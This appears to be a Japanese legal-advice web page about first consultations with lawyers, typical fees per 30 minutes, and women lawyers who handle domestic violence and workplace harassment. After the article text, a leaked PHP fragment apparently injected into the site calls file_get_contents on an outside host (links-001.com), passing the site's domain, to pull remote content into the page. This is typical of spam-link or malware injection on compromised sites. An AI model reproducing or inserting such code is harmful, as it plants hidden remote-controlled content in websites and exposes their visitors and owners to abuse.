前へ
次へ

まずは弁護士に相談すること

弁護士を頼む時に、消費者が一番気になるのは弁護士費用の問題でしょう。
内容によって、解決方法によって、それに要する時間などが千差万別ですから、電話などで問い合わせをしても、即答できるものではありませんし、それぞれのケースに応じて決めざるを得ないのも真実です。
ですが、目安として法律相談の初回、30分間を無料にしているところがあります。
まずはそこで、個人で解決できる問題なのか、やはり法律家が間に入るべき問題なのか、解決策を知ることから始めましょう。
ちなみに、費用は30分ごとに5000円から10000円の範囲内の一定額であることが多く、以後、30分ごとに5000円から25000円の範囲内の額で相談ができるようです。
法律が絡むであろう内容としては、相続が絡む不動産問題であったり、子の親権の絡む離婚問題などです。
しかし最近では、女性弁護士の活躍も期待されており、訴訟になった場合の勝敗率なども男性とヒケを取りません。
特に女性の悩みごとに強く、ドメスティックバイオレンスのみならず、職場におけるセクショアルハラスメント、妊娠や出産を理由とするマタニティハラスメントなどの人権問題に理解を示したり、理解を深めてくれる女性弁護士がいらっしゃいます。
ですが、こうした人権問題に関心を持ってもらいたいのも法律家からの意見でもあり、相談してもらいたい、という声も上げています。
しかし、声に出したいのに出せない女性や、行動に移れない立場にいる女性もいるでしょう。
個人向けで活躍中の法律事務所では、啓発活動を行ったり、法務局内の常設人権相談所で問題解決のサポートをしたり、人権侵害による被害者が少なくなるために救済に努めてくれています。
電話での窓口も開放していますから、深夜帯、早朝問わずに電話をかけてみましょう。
気軽にとはいかない状況であれば、まずは、信頼できる人(家族や友人、上司)に話を聞いてもらい、そこから行動に移りましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top